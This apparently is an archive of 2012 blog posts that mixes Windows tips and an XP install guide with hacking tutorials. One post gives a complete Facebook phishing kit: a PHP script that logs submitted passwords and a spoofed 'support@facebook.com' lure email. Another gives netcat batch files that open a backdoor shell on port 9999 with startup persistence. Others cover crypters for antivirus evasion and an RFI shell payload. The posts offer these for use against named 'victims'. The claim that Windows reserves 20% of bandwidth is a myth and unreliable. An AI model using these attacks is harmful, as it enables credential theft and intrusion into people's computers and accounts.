Friday, May 4, 2012

Two Tips To Speed Up Your Bandwidth By 30%


Tip Number-1
By default all Windows systems reserves 20% of your bandwidth speed. This is done so that any specific application should not overpower other applications for bandwidth. Though this setting is done for good purpose it limits connection speed even though only one application is using bandwidth. By the way even though this setting is disabled no application will conflict with each other on bandwidth. So turning it off can give you boost of 20% in your bandwidth speed.
To turn this feature off,

Click Start-->Run-->type gpedit.msc

This opens the group policy editor. Then go to:

Local Computer Policy-->Computer Configuration-->Administrative Templates-->Network-->QOS Packet Scheduler-->Limit Reservable Bandwidth

Double click on Limit Reservable bandwidth. It will say it is not configured, but the truth is under the 'Explain' tab :

"By default, the Packet Scheduler limits the system to 20 percent of the bandwidth of a connection, but you can use this setting to override the default."

So the trick is to ENABLE reservable bandwidth, then set it to ZERO.

This will allow the system to reserve nothing, rather than the default 20%.

Once done your bandwidth will show increase by 20%.

Tip Number-2
In acient times connection speed was very slow and data has not only to suffer loss due to transmission speed but also due to the hardware flow error. Though with time connection speed has reached much better place than before you hardly need any hardware flow control which by default is still available in all Windows system. To disable it,

Click Start button-->select Connect To
Now right click on your modem and select Properties now select configure and disable all “Hardware Features”
Now disconnect and connect to your network. You’ll find 10% increase.


Before you apply these tweaks open http://www.speedtest.net/ from your browser and check your connection speed. Then apply both tweaks and recheck your speed.

Tested on Windows XP, Windows 2000, Windows 2003 and Windows Vista.

How To Hack Facebook Account | Phishing

In this tutorial we will discus how you can hack Facbook account password by phishing. Phishing is act of creating a replica of legitimate website for stealing passwords and credit card numbers etc. Here I will show you how you can create replica of facebook log-in page and then fool your victim to put his username and password in it so that you can get his account password
.

First of all open www.facebook.com in your web browser, from “file” menu select “save as” and type “Facebook” in file name and select “web page complete” from save as menu. Once done you will have a file named “Facebook.html” and a folder named “Facebook_files”. Folder will have several files in it, let them as it is and open Facebook.html in notepad or word-pad. From edit menu select find, type action in it and locate following string.

action="https://www.facebook.com/login.php?login_attempt=1"

Now replace this string with

action= “mail.php”

Now open notepad type following code in it and create mail.php.

Code:


<?php
header ('Location: https://www.facebook.com/login.php?login_attempt=1 ');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Now save it as mail.php and create an empty log.txt file. Now you'll need a free web hosting service that supports PHP. Go to http://www.100best-free-web-space.com/ and select service and plan that suits you. Now in root folder of your website create Facebook_files folder and upload all files in Facebook_files of your hard disk to it. Come back to root folder and upload Facebook.html, mail.php and log.txt in it. Change permission for log.txt that it can be seen by administrator only. Once done make Facebook.html your index page and make site live.

Now sign up with http://www.hoaxmail.co.uk/ it provides spoofed email service. Now create a message from support@facebook.com to your victim.


Sub: Invalid activity on your facebook account

Body:
Dear facebook user (victim's facebook user name),
Recently we saw some suspicious activity on your account, we suspect it as a malicious script. As a valuable user to us we understand this might be system error, if the activity is not generated by you then please log-in to your account by following link,
<link to phished site>
Failing to log-in within next 48 hours Facebook holds right to suspend your account for sake of privacy of you and others. By logging in you'll confirm it is system error and we will fix it in no time. Your inconvenience is regretted. Thank you.

support@facebook.com,
Facebook, Inc,
1601 S.California Ave
Palo Alto CA 94394
US

If your victim is not security focused, he/she will surely fall prey to it. And will log-in using phished site handing you his password in log.txt file. Pleas note that you must use that email id of victim which he/she uses to log in facebook. If you are in his/her friend list then click on information tab to know log-in email ID.

Countermeasure:
You must not reply any message from facebook may it be legitimate or not by clicking on any links that appear in mail box. Better whenever you receive any mail of this type report it to facebook.com by logging via typing www.facebook.com in your web browser.




Monday, April 2, 2012

Steps to Clean Install XP

  Steps to Clean Install XP

  If the above instructions for configuring your system to boot from  CD
  or you have acquired the necessary boot floppy/floppies; you can now
  boot the computer and follow the on screen prompts. Have your Product Key
  available, typical install is around 30 minutes. If setup seems to hang,
  wait at least 10 minutes + before restarting system. You should experience
  momentary screen blackouts.

  1. Power on the computer. Press the Pause/Break key as soon as you see
     text on the screen. [If you currently are running in an OS of any flavor,
     insert XP CD and restart computer. Skip to #3 if system is configured
     to boot from CD.]


  2. Insert XP CD into CD drive. Press ENTER to resume booting from the XP CD.
     (BIOS must support booting from CD and boot order must be set so CD
     boots before hard drive. If computer does not support booting from CD
     go to 2a for floppy install).

     2a. Floppy install: Boot from Win98/Me/Special XP install floppy
     disk with smartdrv.exe added to the boot disk; or the Win XP set
     of 6 floppy disks.

  3. Look for message "booting from CD" usually located at the bottom of
     the screen. If you have a factory splash screen, press ESC to unload
     it.

     3a. Floppy install: From the A Prompt; A:\type: smartdrv.exe. then
     press ENTER. If you are using the XP boot floppy setup disks skip
     to step #5.

  4. Press any Key when you see the prompt to "Press Any Key"

     4a. Floppy install: CD to the location of the CD-ROM drive with the
     XP setup files; CD to the i386 folder where you will type: winnt.exe
     to start setup.

  5. Setup will start copying files, if you need to install any third
     -   party or RAID drivers press F6 at this time. the copying of files
     can take awhile.

  6. Next you will get the option to repair or enter setup, choose to
     enter setup. Press ENTER. To see images full size, place mouse cursor
     over image and click/double click or press the left button and open.

  7. Press F8 if you agree to the license.

  8. Setup will scan for previous Windows installations

  9. If you are using the upgrade version of XP on a computer without
     any version of Windows currently installed, this is where you will
     replace the XP CD with your qualifying CD, XP setup will scan the
     qualifying CD and instruct you to replace it with the XP CD to continue
     XP setup; otherwise, you will not see this screen. Clean install
     qualifying media can be any of the following Win NT3.51, 4.0, 2000,
     Win 95, 98, Me. 10. Choose the location to install.

     10a If this is a clean hard drive, you can choose to create a
     partition in the un-partitioned space. At this point, you can allow
     Setup to use all the space or set a size for the partition.

     10b If the hard drive or partition has a previous installation of
     XP you want to remove, choose to delete the partition by pressing
     "D". You will then be prompted to create a new partition in the
     empty space. This will remove all data from the delete space.

     10c If you intend to use multiple partitions, or dual boot, this is
     where  you specify the size of the boot partition and or setup
     location for XP. If you are planning to dual boot XP, I would
     create a small 100 meg DOS  partition for the first primary partition,
     then an 8 to 10 gig partition for XP. You can partition and format
     the remaining space after XP is setup from Disk Manager. If you do not
     intend to dual boot, you can either use all the un-partitioned space,
     or create an 8 to 10 gig partition for XP and leave the rest free to
     partition later.

   Note: If a fat32 partition larger than 32 gigabyte is desired, the
   hard drive or partition will need to be created before running XP
   setup. XP will not create a fat 32 partition larger than 32 gig, but
   will support one previously created.

  11. Choose the file system from this screen. If dual booting and you
      created the small 100 meg partition, make it a fat partition. NTFS is
      configured at the optimal file size during the initial setup. See this
      link for more on NTFS

  12. If you have more that one partition or hard drive on your system,
      make sure you are formatting the correct partition/drive.

  13. Select F to continue.

  14. Setup will show a progress box and reboot when copying files is
      complete.

  15. When you see the "Press any Key to Reboot" do not Press any Key.
      If CD boots anyway, remove CD and reboot.

  16. From this point, you will follow the on screen prompts.

  17. If you live outside the US, you will probably need to modify the
      default settings.

  18. Personalize your XP Enter your Name and Organization.

  19. Enter the Product Key. The Key is located on the back of the CD folder
      in  the  Retail versions, and on a holographic label with the OEM
      versions purchased with a piece of hardware. Write this key down and
      secure it in a safe place in case the original is misplaced destroyed
      through natural causes or stupidity. 8-)

  20. Choose a name for the  computer, this should be a unique name for
      the computer, especially if it is to be connected to a network. In Pro,
      you are given the option of creating a password or leaving it blank.

  21. Set your Time Zone and Time and Date.

  22. Setup will scan for network.

  23.  If  detected you will have the choice to choose a typical
       configuration or custom. Choose typical if you are unsure.

  24. For home you will choose your workgroup, if a network is already
      established and you intend to connect to it, use the existing
      workgroup name, otherwise, I suggest using the default.

  25. For Pro, the same goes for Pro as suggested for Home, but you will
      have the choice to join a Domain, if you do  not have a Domain or  do
      not know leave blank.

  26. Setup will continue and reboot when completed ignore the "Press
      Any Key".

  27. The loading XP window will now display after reboot.

  28. You will see a change display settings, say yes, and accept the
      setting if you can see the screen after accepting.

  29. You will see a welcome screen, press next and unfortunately you
      have to wait for the dialog to finish.

  30. Set up you internet or network connection.

  31. This is the Activate, Register screen. You must activate within
      30 days of installing XP, but you do not ever have to register,
      Registration is completely optional and if you do not register, no
      personal information will be transmitted during activation. If you
      register, then activation will transmit that information along with
      the activation. The first Activation is usually done over the internet
      if the computer is connected to the internet, otherwise, it can be
      accomplished by copying the alphanumeric  string from the activation
      screen and make a phone call to the on screen supplied phone number.
      The activation center will then give you a slightly longer number to
      input into for activation. I suggest you do not activate immediately
      in case you need to make hard ware changes, or install to a different
      system within the thirty days, and you will be reminded on boot up
      until you do.

  Blaster worm warning: Do not immediately activate over the internet
  when asked, enable the XP firewall before connecting to the internet.
  You can activate after the firewall is enabled.
  Control Panel - Network Connections. Right click the connection you
  use, Properties, and there is a check box on the Advanced page.

  32. Setup users screen. Set at least one user for yourself or the person
      that will be using the computer.

  33. Thank You

  34.  Logon to XP and apply Service Pack and Critical updates from Windows
       Update before installing any software or hardware.

  35. Install your anti-virus software.

  36. Install all applications and setup your email.

  37. Restore from Files and Settings transfer after reinstalling all
      applications.

Monday, March 26, 2012

Hacking a Network Computer

I wrote this because it really worked for me a few times and I hope it does for you too, all you need is very a gullible target.

As we all know, a Trojan is very likely to be picked up by AV, what you need is Netcat, netcat opens a port on a computer for access (If used correctly by a batch file you open a port on a target computer). You will need to write a batch file. The batch file to copy netcat on the remote computer will have to be run from the target computer (The person on the target will have to execute the batch file in some way). Open Notepad and type this in:

Code:
@echo off

cd\
xcopy \\yourIP\shared folder\netcat.exe
copy \\yourIP\shared folder\netcat.exe (just to be sure)
cd "Documents and Settings"
cd "All Users"
cd "Start Menu"
cd Programs
cd Startup
xcopy \\yourIP\shared folder\Startup.bat (This is another batch file you will write)
cd\
netcat.exe -L -p 9999 -d -e cmd.exe
Save the file as a batch file using Notepad.

The next batch file will be used to make sure the port you specified opens up every time windows starts up, you can specify any port you wish. Open Notepad and type:
Code:
@echo off

cd\
netcat.exe -L -p 9999 -d -e cmd.exe
Save the file as a batch file using Notepad, this will be the file that is copied into the startup folder in the previous batch file we wrote. You can bind the batch file to another file and share that file, let the target execute that file so that he can copy netcat and the other batch file onto his/hers computer thus opening port 9999, after port 9999 has been opened you can then use telnet and telnet to that port on the target computer to have full access without ever needing any passwords of any sort. After you are in change the Administrator password for if something happens to your files, the command is this:

net user Administrator newpassword

Now from here you can do what you want, e.g try shutting down the target computer by browsing to his system32 folder and then type in:

shutdown -r -t 10 -c "Hello"

the computer will then restart in 10 seconds time. You can even play around more by Installing Cain & Abel on your computer and then installing Abel remotely on his computer (Since you know the Administrator password) Once you have Abel on the target you can start and stop services and do more!

Complete Hacking information

Introduction:

We see a millions of people going to different forums and websites and asking "how do i hack an email?", "Can you hack blah for me?". So thought to create a tutorial which will give you the basic idea about what the heck is a "HACK", and how to DEFEND YOUR SELF AGAINST HACKERS.

Disclaimer:

As i have seen controversies in the past, here is the disclaimer.

I or the staff of Go4expert.com's does not take any responsibility if you use this tutorial in unethical way. This is written to help you to beware of whats going around, and save your self by not being hacked!

Background:

Hacking started way too far when the windowsd 98 was designed. Hacking is basically finding out the loop holes and trying leak some information out of it, which may lead you to get some critical information like passwords, credit card details. Sometimes hacking is done just because of the personal offesnses.


Things to remember

I will suggest you, KEEP READING ARTICLES AND TUTORIALS FROM GOOD SITES. THATS THE ONLY WAY YOU CAN LEARN.

Initialization:

Getting back to the main point, I am going to discuss some of the ways of hacking in brief. Hacking is basically bifurcated in 2 major parts.

1. Email or the user information
2. Web based hacking.

Email or user information:



These days the most commonly used and famous way of hacking user information like Emails, Passwords, Credit card details are as follow:

a. Phishing
b. Brute Forcing
c. Keylogging
d. Trojans

a. Phishing:
Phishing is basically a massive attack. What a hacker does is, they created an absoulutely look alike page of some website like yahoo or gmail. They upload it to their own server. And give the link to any n00b user. When they open it, they think that they are on the yahoo or gmail page, they put in their username and password, click on submit and WHOA! your information has been submitted. This is widely used by new people trying to entering into ahcking world.
Most recent example in india was some scam with ICICI bank, lots of user info was stolen as far as i remember. I read it somewhere in the news paper and was thinking what the hell! ?

Disadvantages: Still many people give it a try before going for phishing, because the only problem in phishing is, even if the victim knows a little about internet, he will read the URL and understand that it is not a genuine website.
b. Brute Forcing
Brute forcer is basically a program which could be called as a "cracker". In brute focer you put the username you want to hack, and as a password you put a notepad file which has almost all of the existing english words in it. So what it does is, it will try each and every word from that file and see if anything matches. You might have noticed some topics like "huge pass list" on different forums, they are nothing but the password list to put into your bruteforcer.!

Disadvantages:
1. Sometimes brute forcing may just go for ages!
2. It isnt guaranteed
3. These days many people have alpha-numeric-symbol password which is real tough for brutefocer to detect
4. Most of the famous sites like yahoo, gmail are designed in such a way that it will put the "image captcha" after 3 incorrect login attempts, which stops the bruteforcer.

P.S:- I have made some focused FTP, Gmail & Yahoo bruteforcers which are avilable on my website.
c. Keylogging
Keylogger helps you to create a little filed which is known as "server". You gotta send your server to the victim. he has to click on it and then YOUR DONE! this is what happens.
Best possible way to hack someone. Keyloggers are basically a program which will install themselves in your victim's computer and will keep on recording each and every keystroke pressed by the victim on his keyboard and it will send it to the hacker. There are many ways to receive the keystroke i.e. FTP, Email, Messengers. According to me this is the best way to trick your victim and get their information

Disadvantages :
1. When victim receives the keylogger, in most of the cases, their anti virus would auto delete them. So you have to convince them to desable the anti virus by bluffing something.
2. Sometimes firewall blocks the keylogs from being sent.

Tips :
1. There are some programs which are known as "crypters" which will help you to make your server's undetectable. So your victim's anti-virus would not be able to detect them.
d. Trojans:
Trojans are like father of keyloggers. Trojan sends you the keylogs just as keyloggers, on top of that, it lets you take the control of victim's computer. Edit / delete/ upload / download files from or to their computer. Some more funny features like it will make their keyboard go mad, it may kep on ejecting and re-inserting the cd ROM. Much more..

Disadvantages :
Same as keyloggers.

Tips :
Same as keylogger.

Web Hacking:



I will discuss some most commonly used web hacking techniques which helps hackers to hack any website. This will help you to SAVE YOUR SITE!

1. SQL Injection
2. XSS
3. Shells
4. RFI
5. There are some more but they are TOOO big to be discussed in here.

1. SQL Injection:
Most of the websites these days are connected to an SQL Database. Which helps them to store usernames and passwords [encrypted] when a guest registers to their website. SQL database processes a querie everytime a user logs in. It goes to the database, validates the password, if its correct then it logs in the user and if its not then it gives an error.
So the basic funda is executing a command to parase a query in the database to try to exploit the internet information of the database. I cant really put the entire tutorial about because this is the most complicated way to hack the website!

P.S.:- If you wanna check if YOUR website is vulnerable to RFI attach or not then do the following .

If your site's URL is:
Code:
 yoursite.com/index.php?id=545
just add a ' like this at the end
Code:
 yoursite.com/index.php?id=545'
2. XSS:
XSS is another nice way to ahck some website. Suppose if some website/ forum is allowing HTML in the psot or articles, then a hacker can post a malicious script into the content. So whenever a user opens up the page, the cookies would be sent to the hacker. So he can login as that user and f*ck the website up.
3. Shells:
Shell is a malicious .php script. What you have to do is, find a palce in any website where you can upload any file like avatars, recepie, your tricks, your feedbacks. And you try to upload your shell files from there. And if its uploaded then WHOA!you open it from the URL bar and u can see the entire "FTP" account of that webhosting. YOu can rename/edit / upload/download anything u want including the index page.
This is also known as deface.
4. RFI:
RFI is a good way to deface a website. It is used with shell. Suppose you have uploaded your shell on:
Code:
 yoursite.com/shell.txt
and you found a vulnerable site to RFI... then you can do as follow:
Code:
 victimssite.com/index.php?page=yousite.com/shell.txt
This will again give u the access of your victim's sites FTP , just as shell so you can f*ck up anything you want.

P.S.:- If you wanna check if YOUR website is vulnerable to RFI attach or not then do the following .

If your site's URL is:
Code:
 yoursite.com/index.php?id=545
just add something liek this at the end
Code:
 yoursite.com/index.php?id=http://www.google.com
And if it incldes the google page into your page, that means its vulnerable to RFI.

Sunday, March 25, 2012

HOW TO HACK HOTMAIL/GMAIL/YAHOO/FACEBOOK ID

HOW TO  HACK HOTMAIL/GMAIL/YAHOO/FACEBOOK ID


I’m merely disappointed by the number of technically illiterate people around the world. The most popular question in any hacking related site is “How to hack e-mail” its not tolerated in any security/hacking related forum and if asked you can expect to get a rant from people. the reason is simple because there are NO ways of hacking a e-mail address by easy means and the people who know this fact often get very annoyed when most people don’t understand WHY its NOT POSSIBLE !
The hacking of a e-mail is possible when a person who owns the account gets hacked. the other way is to hack them directly from the e-mail servers which is most unlikely because these sites use sophisticated Intrusion Detection and highly skilled consultants who are up to date with exploits and patch’s. unless you are a real professional hacker its highly unlikely you will ever break into a e-mail server.
People MUST understand that there are NO PROGRAMS/SOFTWARE’S that can hack a e-mail password when you enter an e-mail address. to understand this
better let me explain you how e-mail works
Lets say you have a gmail account
When you enter your username and password and hit login what happens is your outgoing e-mail server encrypts the login information and sends over the network to its destination which is a gmail server which can ONLY decrypt the encrypted credentials then these were checked against its database and if they match it will re direct you to your mail inbox. to authenticate you with the gmail server, it will send you a cookie ( a text file ) with a session ID to your browser confirming that you are authenticated so the gmail server.
So there was a time when e-mail servers gave the option to NOT to use SSL cause it slows down the e-mail. because of the time it takes to encrypt. it was a “happy time” for the hackers who simply used a wifi hotspot to sniff session ID and break into emails !!! why ? because If anyone sniffs your session ID he can use it to login into you mail WITHOUT the password because the session ID is the proof of authentication as I mentioned earlier ^ but with almost all the e-mail servers NOW use a SSL encryption and the Session ID is also encrypted so by sniffing its NOT possible to decrypt the ID !
So there goes Packet Sniffing
You may ask so what ? why the encryption cannot be cracked ?
Because The encryption uses Hypertext Transfer Protocol over Secure Socket Layer and public/Private key encryptions technique which is almost impossible to crack. Do some Research on these terms and you will know why its not possible to crack/
If you’re curious and patient enough read this else Skip
http://www.cohn-family.com/encryption.htm
So now the next possible way is to somehow hack into the gmail servers and pull the password hash’s and then crack them. well, sadly not many people have succeeded doing it because its highly impossible and way too risky
Now after reading all this you might have a slight idea why I ask people who claim “they can hack any e-mail” to prove it !! so if you can make a program that can somehow bypass all the security and bring the password from the gmail server then you deserve a noble prize !!!
<But I must tell you that professional hackers do have few techniques to override these terms I mentioned in certain cases….>
NOW ASK ME HOW TO HACK A E-MAIL ?

Ok you clearly know its almost impossible but the good news is that its possible to hack a individuals computer or a web server. most people lack of common sense and so many people have NO technical knowledge whatsoever. so by hacking them its possible to steal their passwords.
Because we can’t hack the password from the servers but we can hack it from the people who use it..
There are so many ways.. here are some of the methods,
1. Fake Login page – Fake page also known as phishing. This process involves creating a fake login page of a certain e-mail and tweaking the password authentication process so when the user inserts login details it will be sent to the hacker. This is the easiest way to hack when the victim has no technical knowledge.
2. Social Engineering – Humans have certain weaknesses and this process involves exploiting someone’s weakness to retrieve a credential such as a password. for an e.g: There are many incidents in the past like once when a hacker phoned a employee of a company (victim) and identified himself as the Technical Engineer of that company and instructed the employee (victim) to follow a set of FAKE system error checking and eventually received his login password from him by simply convincing him to reveal them. its just simple as that/ it does takes lot of confidence and skill.
3. Keylogger – Its an application which runs hidden from a user in the background and logs/records all the keystrokes of a user. when a user types something it will be recorded and saved. when the system goes online the recorded details will be sent to the hacker. which can contain a e-mail login detail. the keyloggers are outdated and most of them are detected by anti-virus programs. but when used in a LAN network or when the hacker has physical access to a system it proves to be effective. so if your girlfriend/boyfriend is cheating on you this is the way to go.. but I still think smart people don’t keep “cheating related e-mails in their inbox” he he
The downfall of keyloggers are that not many keyloggers can be deployed remotely and they are often picked by anti-virus programs (which can be avoided by using code obfuscation or packing/crypting, changing Entry point..but its more complex)
Another downfall of keylogger is that most of them don’t use any encryption and the data is sent as it is, with a skilled reverse engineer its possible to track down the hacker by breaking the file and analysing the code.
4. Trojans – Programs which are often known as backdoors. these programs are similar to keyloggers but they can execute certain commands sent by the hacker. most Trojans have a built in password stealer which is an application that can steal stored browser passwords. also in addition they have far more sophisticated functions such as webcam capture (YES the hacker can see you when you pick your nose) ability to browse/download/edit your files and folders, audio recording, etc.. different Trojans have different functions. All hacker has to do is create a server and send it to the victim and once the victim opens the file it will drop into the victims system and connect to hackers client. now he can issue commands to his server which is in the victims computer and manipulate it whatever the way he likes.
Trojans are very easy to use and most of them use encryption and security evasion techniques and there are TONS of tutorials all over internet if anyone interested in using them.
I hope I have covered enough information. so next time when you see someone asking “How to hack email” Please point it to this thread. so he/she don’t waste his/her time and money.
My advise is if you have a personal issue such as cheating/breaking up I encourage you to sort them by other means. or maybe Go see a doctor. if she dumped you… MOVE ON !

Thursday, March 22, 2012

How to Protect an Email Account from Being Hacked


How to Protect an Email Account from Being Hacked

Today in this post I’ll teach you how to protect your email account from being hacked. Nowadays I get a lot of emails where most of the people say “My Email account is hacked please help…”. Now one question which arises in our mind is: “Is it so easy to hack an email account? OR Is it so difficult to protect an email account from being hacked?”. The single answer to these two questions is “Absolutely NOT!”. It is neither easy to hack an email nor difficult to protect an email account from bieng hacked.

If this is the case, then what is the reason for many people to lose their accounts?
The answer is very simple. They don’t know how to protect themselves from being hacked! In fact most of the people who lose their email accounts are not the victims of hacking but the victims of Trapping. They lose their passwords not because they are hacked by some expert hackers but they are fooled to such an extent that they themselves give away their password.
Are you confused? If so continue reading and you’ll come to know…
Now I’ll mention some of the most commonly used online scams which fool people and make them lose their passwords. I’ll also mention how to protect your email account from these scams.
1. WEBSITE SPOOFING
Website spoofing is the act of creating a website, with the intention of misleading the readers. The website will be created by a different person or organisation (Other than the original) especially for the purposes of cheating. Normally, the website will adopt the design of the target website and sometimes has a similar URL.
For example a Spoofed Website of Yahoo.com appears exactly same as Yahoo Website. So most of the people believe that it is the original site and lose their passwords. The main intention of spoofed websites is to fool users and take away their passwords. For this,the spoofed sites offer fake login pages. These fake login pages resemble the original login pages of sites like Yahoo,Gmail,Orkut etc. Since it resemble’s the original login page people beleive that it is true and give away their username and passwords by trying to login to their accounts.
Solution:
  • Never try to login/access your email account from the sites other than the original site.
  • Always type the URL of the site in the address bar to get into the site. Never click on the hyperlink to enter the site.
2. BY USING KEYLOGGERS
The other commonly used method to steal password is by using a Keylogger. A Keylogger is nothing but a spyware. The detailed description of keylogger and it’s usage is discussed in the post Hacking an email account. If you read this post you’ll come to know that it is too easy to steal the password using a keylogger program. If you just access your email account from a computer installed with keylogger, you definitely lose your password. This is because the keylogger records each and every keystroke that you type.
Solution:
Protecting yourselves from a keylogger scam is very easy.Just install a good anti-spyware program and update it regularly. This keeps your PC secure from a keylogger. Also there is a program called Anti-keylogger which is specially designed to detect and remove keyloggers. You can use this program to detect some stealth keyloggers which remain undetected by many anti-spyware programs.
3. ACCESSING YOUR EMAIL ACCOUNT FROM CYBER CAFES
Do you access your email from cyber cafes?  Then definitely you are under the risk of loosing your password.In fact many people lose their email account in cyber cafes. For the owner of the cyber cafe it’s just a cakewalk to steal your password. For this he just need’s to install a keylogger on his computers. So when you login to your email account from this PC, you give away your password to the cafe owner. Also there are many Remote Administration Tools (RATs) which can be used to monitor your browsing activities in real time.
This doesn’t mean that you should never use cyber cafes for browsing the internet. I know, not all the cyber cafe owners will be so wicked but it is recommended not to use cafes for accessing confidential information. If it comes to the matter of security never trust anyone, not even your friend. I always use my own PC to login to my accounts to ensure safety.
So with this I conclude my post and assume that I have helped my readers to protect their email accounts from being hacked.